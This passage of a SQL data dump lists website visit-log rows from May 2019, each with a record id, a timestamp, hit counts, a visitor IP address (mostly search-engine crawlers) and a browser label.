0,0,'37.9.113.148','other'),(421022,1558147945,2,2,0,0,'34.215.72.220','chrome'),(421023,1558148455,1,1,0,0,'180.76.15.24','other'),(421024,1558148561,1,1,0,0,'180.76.15.13','other'),(421025,1558149329,1,1,0,0,'66.249.66.132','chrome'),(421026,1558149675,1,1,0,0,'40.77.167.207','other'),(421027,1558149707,1,1,0,0,'66.249.66.220','chrome'),(421028,1558150455,1,1,0,0,'180.76.15.13','other'),(421029,1558150603,1,1,0,0,'40.77.167.60','other'),(421030,1558150989,1,1,0,0,'178.154.244.11','other'),(421031,1558151222,2,2,0,0,'66.249.66.222','chrome'),(421032,1558151497,2,2,0,0,'8.29.198.25','other'),(421033,1558151767,1,1,0,0,'40.77.167.207','other'),(421034,1558152089,1,1,0,0,'157.55.39.143','other'),(421035,1558152516,1,1,0,0,'66.249.66.218','chrome'),(421036,1558153683,1,1,0,0,'209.17.96.218','other'),(421037,1558153884,1,1,0,0,'40.77.167.120','other'),(421038,1558154767,1,1,0,0,'40.77.167.175','other'),(421039,1558155878,1,1,0,0,'157.55.39.143','other'),(421040,1558155913,1,1,0,0,'46.166.188.251','other'),(421041,1558156022,1,1,0,0,'66.249.66.130','chrome'),(421042,1558156066,1,1,0,0,'95.108.213.4','other'),(421043,1558156142,1,1,0,0,'178.154.244.65','other'),(421044,1558156396,1,1,0,0,'87.250.224.118','other'),(421045,1558156402,2,2,0,0,'66.249.66.220','chrome'),(421046,1558156994,1,1,0,0,'157.55.39.118','other'),(421047,1558157439,1,1,0,0,'66.249.66.220','chrome'),(421048,1558158092,1,1,0,0,'66.249.66.222','chrome'),(421049,1558158367,1,1,0,0,'37.9.113.103','other'),(421050,1558159682,1,1,0,0,'93.72.177.17','other'),(421051,1558160728,1,1,0,0,'66.249.66.128','chrome'),(421052,1558161000,1,1,0,0,'87.250.224.65','other'),(421053,1558161293,2,2,0,0,'66.249.66.222','chrome'),(421054,1558161712,1,1,0,0,'213.180.203.9','other'),(421055,1558162346,2,2,0,0,'8.29.198.25','other'),(421056,1558163058,1,1,0,0,'66.249.66.222','chrome'),(421057,1558165141,1,1,0,0,'157.55.39.178','other'),(421058,1558165207,1,1,0,0,'207.46.13.105','other'),(421059,1558165331,1,1,0,0,'207.46.13.46','other'),(421060,1558165840,1,1,0,0,'109.201.154.149','other'),(421061,1558166091,1,1,0,0,'5.45.207.8','other'),(421062,1558166616,1,1,0,0,'5.45.207.79','other'),(421063,1558166702,2,2,0,0,'157.55.39.178','other'),(421064,1558167595,1,1,0,0,'66.249.66.130','chrome'),(421065,1558168179,1,1,0,0,'207.46.13.105','other'),(421066,1558168262,1,1,0,0,'207.46.13.126','other'),(421067,1558168334,3,3,0,0,'66.249.66.220','chrome'),(421068,1558169473,8,8,0,0,'207.46.13.46','other'),(421069,1558169890,5,5,0,0,'207.46.13.126','other'),(421070,1558170084,1,1,0,0,'207.46.13.105','other'),(421071,1558170097,5,5,0,0,'157.55.39.178','other'),(421072,1558170256,1,1,0,0,'66.249.66.218','chrome'),(421073,1558170530,1,1,0,0,'66.249.66.222','chrome'),(421074,1558170610,1,1,0,0,'66.249.66.220','chrome'),(421075,1558171185,1,1,0,0,'207.46.13.126','other'),(421076,1558171761,6,6,0,0,'176.9.9.94','other'),(421077,1558172207,1,1,0,0,'157.55.39.178','other'),(421078,1558173002,1,1,0,0,'207.46.13.46','other'),(421079,1558173089,1,0,1,0,'66.249.66.130',''),(421080,1558173186,1,1,0,0,'66.249.66.132','chrome'),(421081,1558173204,1,1,0,0,'8.29.198.26','other'),(421082,1558173240,1,1,0,0,'8.29.198.25','other'),(421083,1558173474,1,1,0,0,'66.249.66.218','chrome'),(421084,1558173913,3,3,0,0,'207.46.13.126','other'),(421085,1558174298,1,1,0,0,'66.249.66.222','chrome'),(421086,1558174566,1,1,0,0,'109.74.154.72','chrome'),(421087,1558174639,1,1,0,0,'207.46.13.46','other'),(421088,1558174789,1,1,0,0,'37.73.209.107','chrome'),(421089,1558174848,1,1,0,0,'91.196.178.183','chrome'),(421090,1558175836,1,1,0,0,'66.249.66.222','chrome'),(421091,1558175889,3,3,0,0,'66.249.66.220','chrome'),(421092,1558176169,1,1,0,0,'207.46.13.46','other'),(421093,1558176511,1,1,0,0,'178.154.244.11','other'),(421094,1558176640,3,3,0,0,'35.192.153.213','chrome'),(421095,1558176682,3,3,0,0,'35.184.135.85','chrome'),(421096,1558176705,3,3,0,0,'35.192.48.219','chrome'),(421097,1558176718,2,2,0,0,'35.239.220.101','chrome'),(421099,1558176731,2,2,0,0,'34.66.155.23','chrome'),(421101,1558176748,3,3,0,0,'34.66.51.87','chrome'),(421102,1558177064,1,1,0,0,'207.46.13.105','other'),(421103,1558177580,1,1,0,0,'66.249.66.218','chrome'),(421104,1558178328,1,1,0,0,'109.201.152.1','other'),(421105,1558178414,1,1,0,0,'13.66.139.0','other'),(421106,1558178959,1,1,0,0,'157.55.39.178','other'),(421107,1558179416,1,1,0,0,'207.46.13.105','other'),(421108,1558180114,1,1,0,0,'5.45.207.19','other'),(421109,1558180230,1,1,0,0,'207.46.13.126','other'),(421110,1558180986,1,1,0,0,'207.46.13.105','other'),(421111,1558181016,1,1,0,0,'91.196.178.34','chrome'),(421112,1558181281,1,1,0,0,'5.45.207.79','other'),(421113,1558181311,1,1,0,0,'193.106.30.98','chrome'),(421114,1558181397,1,1,0,0,'178.154.244.11','other'),(421115,1558181716,1,1,0,0,'5.45.207.8','other'),(421116,1558182206,1,1,0,0,'207.46.13.105','other'),(421117,1558182211,1,1,0,0,'157.55.39.178','other'),(421118,1558182233,1,1,0,0,'207.46.13.46','other'),(421119,1558184075,2,2,0,0,'8.29.198.26','other'),(421120,1558184564,1,1,0,0,'207.46.13.105','other'),(421121,1558184570,2,2,0,0,'66.249.66.218','chrome'),(421122,1558185060,2,2,0,0,'66.249.66.222','chrome'),(421123,1558185724,2,2,0,0,'66.249.66.130','chrome'),(421124,1558185735,7,7,0,0,'66.249.66.218','chrome'),(421125,1558185834,1,1,0,0,'66.249.66.128','chrome'),(421126,1558185850,4,4,0,0,'66.249.66.220','chrome'),(421127,1558186721,1,1,0,0,'66.249.66.130','chrome'),(421128,1558186736,2,2,0,0,'5.45.207.79','other'),(421129,1558186931,1,1,0,0,'66.249.66.128','chrome'),(421130,1558187047,2,2,0,0,'66.249.66.220','chrome'),(421131,1558187278,1,1,0,0,'66.249.66.132','chrome'),(421132,1558187622,1,1,0,0,'66.249.66.222','chrome'),(421133,1558187860,1,1,0,0,'66.249.66.128','chrome'),(421134,1558188204,1,1,0,0,'207.46.13.105','other'),(421135,1558188969,2,2,0,0,'66.249.66.128','chrome'),(421136,1558189049,2,2,0,0,'66.249.66.218','chrome'),(421137,1558189827,1,1,0,0,'157.55.39.178','other'),(421138,1558190264,3,3,0,0,'66.249.66.218','chrome'),(421139,1558190488,1,1,0,0,'207.46.13.105','other'),(421140,1558190501,1,1,0,0,'207.46.13.46','other'),(421141,1558190848,1,1,0,0,'207.46.13.126','other'),(421142,1558191046,2,2,0,0,'66.249.66.220','chrome'),(421143,1558191171,1,1,0,0,'66.249.66.218','chrome'),(421144,1558192662,1,1,0,0,'66.249.66.222','chrome'),(421145,1558192868,1,1,0,0,'66.249.66.218','chrome'),(421146,1558193121,2,2,0,0,'207.46.13.105','other'),(421147,1558193130,1,1,0,0,'207.46.13.46','other'),(421148,1558193466,1,1,0,0,'95.163.255.93','other'),(421149,1558193892,1,1,0,0,'87.250.224.107','other'),(421150,1558193908,2,2,0,0,'66.249.66.222','chrome'),(421151,1558193938,1,1,0,0,'66.249.66.132','chrome'),(421152,1558194009,1,1,0,0,'87.250.224.64','other'),(421153,1558194108,1,1,0,0,'178.154.244.49','other'),(421154,1558194929,2,2,0,0,'8.29.198.26','other'),(421155,1558195014,1,1,0,0,'66.249.66.218','chrome'),(421156,1558195129,1,1,0,0,'207.46.13.126','other'),(421157,1558196242,1,1,0,0,'5.45.207.19','other'),(421158,1558196794,1,1,0,0,'178.159.37.73','chrome'),(421159,1558196797,1,1,0,0,'178.154.244.11','other'),(421160,1558196941,1,1,0,0,'157.55.39.178','other'),(421161,1558197090,2,2,0,0,'207.46.13.105','other'),(421162,1558197486,1,1,0,0,'37.9.113.148','other'),(421163,1558197796,1,1,0,0,'207.46.13.46','other'),(421164,1558197922,3,3,0,0,'66.249.66.222','chrome'),(421165,1558198793,1,1,0,0,'178.154.244.11','other'),(421166,1558198901,1,1,0,0,'66.249.66.218','chrome'),(421167,1558199221,2,2,0,0,'66.249.66.132','chrome'),(421168,1558199876,1,1,0,0,'5.45.207.19','other'),(421169,1558200714,1,1,0,0,'176.9.9.94','other'),(421170,1558201047,1,1,0,0,'66.249.66.222','chrome'),(421171,1558201207,1,1,0,0,'5.45.207.19','other'),(421172,1558201355,1,1,0,0,'5.45.207.79','other'),(421173,1558201405,1,1,0,0,'66.249.66.218','chrome'),(421174,1558202131,1,1,0,0,'207.46.13.105','other'),(421175,1558203277,1,1,0,0,'157.55.39.178','other'),(421176,1558204321,1,1,0,0,'5.45.207.19','other'),(421177,1558205162,1,1,0,0,'91.196.178.50','chrome'),(421178,1558205275,1,1,0,0,'95.163.255.97','other'),(421179,1558205363,1,1,0,0,'66.249.66.128','chrome'),(421180,1558205780,1,1,0,0,'8.29.198.27','other'),(421181,1558205827,1,1,0,0,'8.29.198.26','other'),(421182,1558206173,1,1,0,0,'207.46.13.46','other'),(421183,1558206349,1,1,0,0,'37.9.113.103','other'),(421184,1558206645,1,1,0,0,'66.249.66.218','chrome'),(421185,1558207845,1,1,0,0,'91.196.178.48','chrome'),(421186,1558207972,1,1,0,0,'95.163.255.94','other'),(421187,1558208534,2,2,0,0,'207.46.13.126','other'),(421188,1558208571,1,1,0,0,'66.249.66.220','chrome'),(421189,1558208655,1,1,0,0,'180.76.15.161','other'),(421190,1558208786,1,1,0,0,'207.46.13.46','other'),(421191,1558208831,1,1,0,0,'95.163.255.167','other'),(421192,1558208916,1,1,0,0,'157.55.39.178','other'),(421193,1558208948,1,1,0,0,'178.154.244.11','other'),(421194,1558209530,1,1,0,0,'66.249.66.222','chrome'),(421195,1558211150,1,1,0,0,'207.46.13.46','other'),(421196,1558211216,1,1,0,0,'157.55.39.178','other'),(421197,1558212506,1,1,0,0,'207.46.13.105','other'),(421198,1558212526,1,1,0,0,'207.46.13.126','other'),(421199,1558212587,1,1,0,0,'66.249.66.218','chrome'),(421200,1558212603,1,1,0,0,'141.8.142.103','other'),(421201,1558212965,1,1,0,0,'37.9.113.148','other'),(421202,1558213082,1,1,0,0,'178.154.171.27','other'),(421203,1558213446,1,1,0,0,'207.46.13.46','other'),(421204,1558214185,1,1,0,0,'207.46.13.126','other'),(421205,1558214216,1,1,0,0,'13.66.139.0','other'),(421206,1558214270,1,1,0,0,'157.55.39.178','other'),(421207,1558214470,1,1,0,0,'95.163.255.179','other'),(421208,1558215331,1,1,0,0,'93.80.129.106','msie'),(421209,1558215402,1,1,0,0,'178.154.171.17','other'),(421210,1558215581,1,1,0,0,'13.66.139.0','other'),(421211,1558215639,2,2,0,0,'66.249.66.222','chrome'),(421212,1558216309,1,1,0,0,'207.46.13.105','other'),(421213,1558216605,1,1,0,0,'87.250.224.107','other'),(421214,1558216639,1,1,0,0,'8.29.198.27','other'),(421215,1558216687,1,1,0,0,'8.29.198.25','other'),(421216,1558216738,1,1,0,0,'66.249.66.128','chrome'),(421217,1558216793,1,1,0,0,'157.55.39.178','other'),(421218,1558217507,1,1,0,0,'207.46.13.126','other'),(421219,1558217874,1,1,0,0,'66.249.66.128','chrome'),(421220,1558217890,1,1,0,0,'66.249.66.220','chrome'),(421221,1558217960,1,1,0,0,'66.249.66.218','chrome'),(421222,1558218864,1,1,0,0,'157.55.39.178','other'),(421223,1558219019,1,1,0,0,'109.162.1.0','opera'),(421224,1558219633,1,1,0,0,'141.8.142.144','other'),(421225,1558219647,1,1,0,0,'66.249.66.218','chrome'),(421226,1558219797,1,1,0,0,'180.76.15.8','other'),(421227,1558219920,1,1,0,0,'87.250.224.65','other'),(421228,1558220940,1,1,0,0,'66.249.66.128','chrome'),(421229,1558221025,1,1,0,0,'207.46.13.105','other'),(421230,1558221029,1,1,0,0,'178.154.244.49','other'),(421231,1558221693,1,1,0,0,'66.249.66.222','chrome'),(421232,1558221866,1,1,0,0,'141.8.142.103','other'),(421233,1558221891,1,1,0,0,'87.250.224.47','other'),(421234,1558222211,1,1,0,0,'66.249.66.220','chrome'),(421235,1558223366,1,1,0,0,'66.249.66.218','chrome'),(421236,1558223482,1,1,0,0,'66.249.66.222','chrome'),(421237,1558224169,1,1,0,0,'157.55.39.178','other'),(421238,1558225080,2,2,0,0,'207.46.13.126','other'),(421239,1558225460,1,1,0,0,'66.249.66.130','chrome'),(421240,1558225739,1,1,0,0,'66.249.66.220','chrome'),(421241,1558226076,1,1,0,0,'66.249.66.218','chrome'),(421242,1558227486,1,1,0,0,'8.29.198.26','other'),(421243,1558227529,1,1,0,0,'8.29.198.27','other'),(421244,1558227745,1,1,0,0,'66.249.66.132','chrome'),(421245,1558227906,1,1,0,0,'207.46.13.105','other'),(421246,1558227966,1,1,0,0,'178.154.244.11','other'),(421247,1558228016,1,1,0,0,'141.8.142.103','other'),(421248,1558228018,2,2,0,0,'207.46.13.46','other'),(421249,1558228114,1,1,0,0,'5.45.207.79','other'),(421250,1558230573,1,1,0,0,'66.249.66.130','chrome'),(421251,1558231244,1,1,0,0,'157.55.39.178','other'),(421252,1558231388,1,1,0,0,'66.249.66.128','chrome'),(421253,1558232023,1,1,0,0,'5.45.207.19','other'),(421254,1558232374,2,2,0,0,'207.46.13.126','other'),(421255,1558233366,1,1,0,0,'66.249.66.218','chrome'),(421256,1558233566,1,1,0,0,'66.249.66.128','chrome'),(421257,1558233693,1,1,0,0,'207.46.13.126','other'),(421258,1558235677,1,1,0,0,'66.249.66.220','chrome'),(421259,1558235962,1,1,0,0,'5.45.207.19','other'),(421260,1558236506,1,1,0,0,'40.77.167.163','other'),(421261,1558236700,1,1,0,0,'66.249.66.130','chrome'),(421262,1558237962,1,1,0,0,'157.55.39.172','other'),(421263,1558237991,1,1,0,0,'40.77.167.37','other'),(421264,1558238054,1,1,0,0,'157.55.39.242','other'),(421265,1558238328,2,2,0,0,'8.29.198.27','other'),(421266,1558238528,1,1,0,0,'207.46.13.187','other'),(421267,1558238712,1,1,0,0,'207.46.13.205','other'),(421268,1558239429,1,1,0,0,'207.46.13.213','other'),(421269,1558239966,1,1,0,0,'207.46.13.46','other'),(421270,1558240020,1,1,0,0,'66.249.66.132','chrome'),(421271,1558241123,1,1,0,0,'66.249.66.218','chrome'),(421272,1558241204,1,1,0,0,'91.209.11.236','other'),(421273,1558241526,1,1,0,0,'66.249.66.128','chrome'),(421274,1558241711,1,1,0,0,'157.55.39.210','other'),(421275,1558241731,1,1,0,0,'40.77.167.81','other'),(421276,1558241894,1,1,0,0,'95.108.213.4','other'),(421277,1558242341,1,1,0,0,'66.249.66.218','chrome'),(421278,1558242790,1,1,0,0,'207.46.13.35','other'),(421279,1558242842,1,1,0,0,'66.249.66.130','chrome'),(421280,1558243213,1,1,0,0,'40.77.167.204','other'),(421281,1558243277,1,1,0,0,'95.163.255.99','other'),(421282,1558243657,1,1,0,0,'207.46.13.4','other'),(421283,1558244095,1,1,0,0,'178.154.244.11','other'),(421284,1558244123,1,1,0,0,'95.163.255.95','other'),(421285,1558244320,1,1,0,0,'141.8.142.103','other'),(421286,1558244837,1,1,0,0,'109.201.138.227','other'),(421287,1558245066,1,1,0,0,'207.46.13.26','other'),(421288,1558245102,1,1,0,0,'207.46.13.35','other'),(421289,1558245543,1,1,0,0,'157.55.39.106','other'),(421290,1558245794,1,1,0,0,'5.45.207.79','other'),(421291,1558246216,1,1,0,0,'66.249.66.222','chrome'),(421292,1558246309,1,1,0,0,'66.249.66.218','chrome'),(421293,1558246326,1,1,0,0,'40.77.167.149','other'),(421294,1558246334,1,1,0,0,'207.46.13.4','other'),(421295,1558247623,2,2,0,0,'66.249.66.222','chrome'),(421296,1558247853,1,1,0,0,'66.249.66.128','chrome'),(421297,1558248167,1,1,0,0,'185.220.100.253','other'),(421298,1558248318,1,1,0,0,'207.46.13.4','other'),(421299,1558248458,2,2,0,0,'52.11.104.41','chrome'),(421300,1558248622,2,2,0,0,'66.249.66.132','chrome'),(421301,1558248791,1,1,0,0,'40.77.167.59','other'),(421302,1558248956,1,1,0,0,'66.249.66.222','chrome'),(421303,1558249166,1,1,0,0,'8.29.198.27','other'),(421304,1558249222,1,1,0,0,'8.29.198.26','other'),(421305,1558249396,1,1,0,0,'5.45.207.79','other'),(421306,1558249531,1,1,0,0,'5.45.207.19','other'),(421307,1558249679,1,1,0,0,'178.154.244.11','other'),(421308,1558249686,1,1,0,0,'40.77.167.149','other'),(421309,1558249791,1,1,0,0,'66.249.66.130','chrome'),(421310,1558249893,1,1,0,0,'66.249.66.222','chrome'),(421311,1558250125,1,1,0,0,'66.249.66.220','chrome'),(421312,1558251320,1,1,0,0,'66.249.66.128','chrome'),(421313,1558251370,1,1,0,0,'157.55.39.181','other'),(421314,1558251639,1,1,0,0,'66.249.66.218','chrome'),(421315,1558251782,2,2,0,0,'66.249.66.220','chrome'),(421316,1558253432,2,2,0,0,'66.249.66.220','chrome'),(421317,1558253551,1,1,0,0,'66.249.66.218','chrome'),(421318,1558253583,2,2,0,0,'66.249.66.222','chrome'),(421319,1558254089,1,1,0,0,'40.77.167.48','other'),(421320,1558255075,1,1,0,0,'141.8.183.23','other'),(421321,1558255079,1,1,0,0,'37.9.113.103','other'),(421322,1558255309,1,1,0,0,'141.8.142.65','other'),(421323,1558255328,1,1,0,0,'37.9.113.20','other'),(421324,1558255572,1,1,0,0,'66.249.66.220','chrome'),(421325,1558256714,1,1,0,0,'40.77.167.168','other'),(421326,1558257105,1,1,0,0,'66.249.66.130','chrome'),(421327,1558258557,1,1,0,0,'95.163.255.194','other'),(421328,1558258756,1,1,0,0,'157.55.39.228','other'),(421329,1558260028,1,1,0,0,'8.29.198.25','other'),(421330,1558260059,1,1,0,0,'8.29.198.27','other'),(421331,1558260308,1,1,0,0,'37.9.113.148','other'),(421332,1558260525,1,1,0,0,'141.8.142.144','other'),(421333,1558260544,1,1,0,0,'178.154.244.49','other'),(421334,1558260723,1,1,0,0,'109.74.154.72','chrome'),(421335,1558260794,1,1,0,0,'180.76.15.134','other'),(421336,1558260912,1,1,0,0,'141.8.183.23','other'),(421337,1558261300,1,1,0,0,'157.55.39.228','other'),(421338,1558261613,1,1,0,0,'123.126.113.86','other'),(421339,1558261785,1,1,0,0,'66.249.66.222','chrome'),(421340,1558262692,1,1,0,0,'95.108.213.4','other'),(421341,1558262730,1,1,0,0,'95.108.213.50','other'),(421342,1558262733,1,1,0,0,'178.154.200.8','other'),(421343,1558262779,1,1,0,0,'66.249.66.222','chrome'),(421344,1558262834,1,1,0,0,'207.46.13.113','other'),(421345,1558263077,2,2,0,0,'35.192.218.62','chrome'),(421346,1558263182,1,1,0,0,'66.249.66.132','chrome'),(421347,1558263303,2,2,0,0,'66.249.66.218','chrome'),(421348,1558263386,1,1,0,0,'5.45.207.79','other'),(421349,1558264788,1,1,0,0,'178.154.244.11','other'),(421350,1558264915,2,2,0,0,'66.249.66.130','chrome'),(421351,1558265224,1,1,0,0,'185.138.228.212','chrome'),(421352,1558265582,1,1,0,0,'66.249.66.222','chrome'),(421353,1558266162,1,1,0,0,'141.8.142.108','other'),(421354,1558266175,4,4,0,0,'5.45.207.19','other'),(421355,1558266410,1,1,0,0,'207.46.13.153','other'),(421356,1558267458,1,1,0,0,'40.77.167.126','other'),(421357,1558269571,1,1,0,0,'40.77.167.126','other'),(421358,1558269804,1,1,0,0,'66.249.66.132','chrome'),(421359,1558269862,2,2,0,0,'157.55.39.228','other'),(421360,1558269863,1,1,0,0,'66.249.66.218','chrome'),(421361,1558270780,1,1,0,0,'66.249.66.128','chrome'),(421362,1558270870,1,1,0,0,'8.29.198.27','other'),(421363,1558270887,1,1,0,0,'8.29.198.25','other'),(421364,1558271644,1,1,0,0,'5.45.207.19','other'),(421365,1558271770,2,2,0,0,'66.249.66.220','chrome'),(421366,1558272913,1,1,0,0,'66.249.66.220','chrome'),(421367,1558272956,1,1,0,0,'66.249.66.218','chrome'),(421368,1558273515,1,1,0,0,'66.249.66.222','chrome'),(421369,1558274298,1,1,0,0,'157.55.39.62','other'),(421370,1558277501,1,1,0,0,'178.154.244.11','other'),(421371,1558277694,1,1,0,0,'141.8.142.103','other'),(421372,1558277950,1,1,0,0,'207.46.13.153','other'),(421373,1558278695,1,1,0,0,'40.77.167.33','other'),(421374,1558279173,1,1,0,0,'66.249.66.130','chrome'),(421375,1558279720,1,1,0,0,'66.249.66.132','chrome'),(421376,1558280088,2,2,0,0,'40.77.167.163','other'),(421377,1558280196,1,1,0,0,'82.145.210.184','other'),(421378,1558280930,1,1,0,0,'66.249.66.220','chrome'),(421379,1558281045,1,1,0,0,'195.34.207.24','chrome'),(421380,1558281326,1,1,0,0,'66.249.66.218','chrome'),(421381,1558281727,1,1,0,0,'8.29.198.25','other'),(421382,1558281728,1,1,0,0,'8.29.198.26','other'),(421383,1558282068,1,1,0,0,'87.250.224.47','other'),(421384,1558282524,1,1,0,0,'46.211.120.82','chrome'),(421385,1558283355,16,16,0,0,'148.251.78.18','other'),(421386,1558284336,104,104,0,0,'5.9.70.117','other'),(421387,1558285241,1,1,0,0,'46.211.134.213','chrome'),(421388,1558285243,1,1,0,0,'66.249.66.222','chrome'),(421389,1558285421,6,6,0,0,'78.46.85.236','other'),(421390,1558285595,1,1,0,0,'207.46.13.6','other'),(421391,1558286209,2,2,0,0,'40.77.167.33','other'),(421392,1558286264,1,1,0,0,'66.249.66.130','chrome'),(421393,1558286370,1,1,0,0,'207.46.13.50','other'),(421394,1558288012,1,1,0,0,'5.45.207.19','other'),(421395,1558288235,1,1,0,0,'213.180.203.17','other'),(421396,1558288245,1,1,0,0,'40.77.167.116','other'),(421397,1558289287,1,1,0,0,'157.55.39.198','other'),(421398,1558289909,1,1,0,0,'193.106.30.98','chrome'),(421399,1558290281,1,1,0,0,'91.196.178.33','chrome'),(421400,1558290755,1,1,0,0,'66.249.66.130','chrome'),(421401,1558290838,1,1,0,0,'66.249.66.132','chrome'),(421402,1558290908,1,1,0,0,'207.46.13.6','other'),(421403,1558291044,1,1,0,0,'157.55.39.207','other'),(421404,1558291261,1,1,0,0,'66.249.66.218','chrome'),(421405,1558291927,1,1,0,0,'207.46.13.6','other'),(421406,1558292222,2,2,0,0,'66.249.66.132','chrome'),(421407,1558292463,1,1,0,0,'66.249.66.130','chrome'),(421408,1558292570,1,1,0,0,'8.29.198.26','other'),(421409,1558292582,1,1,0,0,'8.29.198.27','other'),(421410,1558292924,1,1,0,0,'207.46.13.6','other'),(421411,1558293674,1,1,0,0,'141.8.142.103','other'),(421412,1558293958,1,1,0,0,'95.108.181.75','other'),(421413,1558294700,1,1,0,0,'157.55.39.207','other'),(421414,1558294868,1,1,0,0,'141.8.142.191','other'),(421415,1558295114,1,0,1,0,'66.249.66.218',''),(421416,1558296806,1,1,0,0,'207.46.13.6','other'),(421417,1558297308,2,2,0,0,'157.55.39.198','other'),(421418,1558298113,1,1,0,0,'5.45.207.19','other'),(421419,1558298973,1,1,0,0,'40.77.167.67','other'),(421420,1558299514,3,3,0,0,'40.77.167.116','other'),(421421,1558300962,1,1,0,0,'40.77.167.60','other'),(421422,1558301235,1,1,0,0,'109.201.154.134','other'),(421423,1558301303,1,1,0,0,'109.201.154.165','other'),(421424,1558301432,1,1,0,0,'5.45.207.79','other'),(421425,1558301857,2,2,0,0,'207.46.13.144','other'),(421426,1558302362,1,1,0,0,'37.9.113.20','other'),(421427,1558302501,3,3,0,0,'5.45.207.19','other'),(421428,1558303418,1,1,0,0,'8.29.198.27','other'),(421429,1558303423,1,1,0,0,'8.29.198.26','other'),(421430,1558303424,1,1,0,0,'66.249.66.220','chrome'),(421431,1558303896,1,1,0,0,'207.46.13.144','other'),(421432,1558305109,1,1,0,0,'5.45.207.79','other'),(421433,1558306255,1,1,0,0,'213.180.203.9','other'),(421434,1558306556,1,1,0,0,'207.46.13.52','other'),(421435,1558308283,1,1,0,0,'66.249.66.222','chrome'),(421436,1558308682,1,1,0,0,'66.249.66.218','chrome'),(421437,1558309213,1,1,0,0,'66.249.66.222','chrome'),(421438,1558310731,1,1,0,0,'66.249.66.220','chrome'),(421439,1558311963,1,1,0,0,'66.249.66.222','chrome'),(421440,1558312419,1,1,0,0,'66.249.66.132','chrome'),(421441,1558312578,1,1,0,0,'207.46.13.52','other'),(421442,1558312909,1,1,0,0,'66.249.66.222','chrome'),(421443,1558313743,1,1,0,0,'66.249.66.218','chrome'),(421444,1558314264,2,2,0,0,'8.29.198.27','other'),(421445,1558315257,1,1,0,0,'18.237.22.113','other'),(421446,1558315506,1,1,0,0,'66.249.66.222','chrome'),(421447,1558315612,1,1,0,0,'66.249.66.218','chrome'),(421448,1558315620,1,1,0,0,'207.46.13.52','other'),(421449,1558316802,1,1,0,0,'178.154.244.11','other'),(421450,1558318381,2,2,0,0,'66.249.66.220','chrome'),(421451,1558318793,1,1,0,0,'66.249.66.130','chrome'),(421452,1558318988,1,1,0,0,'66.249.66.218','chrome'),(421453,1558319541,1,1,0,0,'207.46.13.109','other'),(421454,1558319941,1,1,0,0,'157.55.39.3','other'),(421455,1558321593,1,1,0,0,'157.55.39.162','other'),(421456,1558322160,1,1,0,0,'66.249.66.132','chrome'),(421457,1558322648,1,1,0,0,'66.249.66.222','chrome'),(421458,1558322886,1,1,0,0,'207.46.13.109','other'),(421459,1558324412,1,1,0,0,'207.46.13.89','other'),(421460,1558325102,2,2,0,0,'8.29.198.27','other'),(421461,1558325418,2,2,0,0,'34.216.98.159','chrome'),(421462,1558326252,1,1,0,0,'40.77.167.7','other'),(421463,1558326309,1,1,0,0,'66.249.66.222','chrome'),(421464,1558326804,1,1,0,0,'5.45.207.19','other'),(421465,1558326958,1,1,0,0,'95.163.255.197','other'),(421466,1558327422,1,1,0,0,'207.46.13.217','other'),(421467,1558327576,2,2,0,0,'66.249.66.222','chrome'),(421468,1558327994,1,1,0,0,'66.249.66.218','chrome'),(421469,1558329986,1,1,0,0,'51.68.174.112','other'),(421470,1558330081,1,1,0,0,'40.77.167.81','other'),(421471,1558330425,1,1,0,0,'5.45.207.76','other'),(421472,1558330459,1,1,0,0,'95.108.181.57','other'),(421473,1558330546,1,1,0,0,'5.45.207.79','other'),(421474,1558330700,1,1,0,0,'5.255.253.38','other'),(421475,1558330798,1,1,0,0,'46.166.190.159','other'),(421476,1558331349,1,1,0,0,'207.46.13.92','other'),(421477,1558331803,1,1,0,0,'93.79.120.172','msie'),(421478,1558332261,1,1,0,0,'40.77.167.120','other'),(421479,1558332810,1,1,0,0,'66.249.66.132','chrome'),(421480,1558332861,1,1,0,0,'207.46.13.92','other'),(421481,1558332924,1,1,0,0,'66.249.66.128','chrome'),(421482,1558333455,1,1,0,0,'40.77.167.7','other'),(421483,1558333599,1,1,0,0,'46.166.137.207','other'),(421484,1558333713,1,1,0,0,'95.163.255.178','other'),(421485,1558333726,1,1,0,0,'180.76.15.162','other'),(421486,1558334067,1,1,0,0,'178.93.251.161','chrome'),(421487,1558334404,2,2,0,0,'207.46.13.92','other'),(421488,1558334495,1,1,0,0,'141.8.142.103','other'),(421489,1558334826,1,1,0,0,'91.196.177.46','firefox'),(421490,1558335233,1,1,0,0,'66.249.66.128','chrome'),(421491,1558335726,1,1,0,0,'180.76.15.147','other'),(421492,1558335948,1,1,0,0,'8.29.198.25','other'),(421493,1558335949,1,1,0,0,'8.29.198.26','other'),(421494,1558337513,1,1,0,0,'193.106.30.98','chrome'),(421495,1558337658,1,1,0,0,'40.77.167.81','other'),(421496,1558337858,1,1,0,0,'95.163.255.93','other'),(421497,1558337930,1,1,0,0,'40.77.167.7','other'),(421498,1558339330,1,1,0,0,'66.249.66.218','chrome'),(421499,1558339533,1,1,0,0,'91.196.178.89','chrome'),(421500,1558339674,1,1,0,0,'93.183.241.22','chrome'),(421501,1558339776,2,2,0,0,'40.77.167.49','other'),(421502,1558339804,1,1,0,0,'95.132.21.126','chrome'),(421503,1558339832,1,1,0,0,'87.250.224.118','other'),(421504,1558339836,1,1,0,0,'141.8.142.191','other'),(421505,1558339859,1,1,0,0,'95.108.213.50','other'),(421506,1558340331,1,1,0,0,'66.249.66.218','chrome'),(421507,1558341264,1,1,0,0,'40.77.167.49','other'),(421508,1558341716,2,2,0,0,'91.196.178.91','chrome'),(421509,1558342154,1,1,0,0,'40.77.167.42','other'),(421510,1558342982,1,1,0,0,'66.249.66.220','chrome'),(421511,1558344195,1,1,0,0,'95.163.255.93','other'),(421512,1558344205,1,1,0,0,'87.250.224.65','other'),(421513,1558344466,1,1,0,0,'178.92.93.221','chrome'),(421514,1558344585,1,1,0,0,'207.46.13.89','other'),(421515,1558344645,1,1,0,0,'66.249.66.218','chrome'),(421516,1558344770,1,1,0,0,'125.64.16.40','other'),(421517,1558345213,7,7,0,0,'91.196.178.102','chrome'),(421518,1558345540,1,1,0,0,'91.196.177.15','chrome'),(421519,1558345751,2,2,0,0,'37.55.233.201','opera'),(421520,1558346085,2,2,0,0,'37.55.233.201','firefox'),(421521,1558346248,1,1,0,0,'207.46.13.98','other'),(421522,1558346306,1,1,0,0,'157.55.39.218','other'),(421523,1558346681,1,1,0,0,'66.249.66.128','chrome'),(421524,1558346758,1,1,0,0,'180.76.15.137','other'),(421525,1558346800,1,1,0,0,'8.29.198.26','other'),(421526,1558346806,1,1,0,0,'8.29.198.27','other'),(421527,1558346975,1,1,0,0,'40.77.167.58','o